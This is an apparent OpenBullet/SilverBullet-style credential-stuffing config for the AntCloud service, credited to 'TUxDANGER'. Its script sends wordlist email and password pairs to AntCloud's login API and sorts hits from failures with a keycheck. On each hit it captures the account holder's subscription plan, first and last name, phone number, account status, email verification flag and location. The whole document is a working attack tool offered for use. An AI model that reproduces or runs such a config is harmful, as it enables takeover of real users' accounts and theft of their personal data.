[SETTINGS]
{
  "Name": "AntCloud",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2024-11-15T14:22:38.9983067+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "TUxDANGER",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Default",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "AntCloud",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FF800000",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://api.antcloud.co/api/users/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://antcloud.co" 
  HEADER "Referer: https://antcloud.co/" 

PARSE "<SOURCE>" LR "\"},\"currentPlan\":" "," CreateEmpty=FALSE -> CAP "Subscription" 

PARSE "<SOURCE>" LR "firstName\":" "," CreateEmpty=FALSE -> CAP "First Name" 

PARSE "<SOURCE>" LR ",\"lastName\":" "," CreateEmpty=FALSE -> CAP "LastName" 

PARSE "<SOURCE>" LR "inactive\":" "," CreateEmpty=FALSE -> CAP "Status" 

PARSE "<SOURCE>" LR "phone\":" "," CreateEmpty=FALSE -> CAP "Phone No" 

PARSE "<SOURCE>" LR "emailVerified\":" "," CreateEmpty=FALSE -> CAP "Verified" 

PARSE "<SOURCE>" LR "location\":{" "}," -> VAR "Location" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The email or password provided is incorrect" 
  KEYCHAIN Success OR 
    KEY "\"message\":\"Auth Passed\"" 

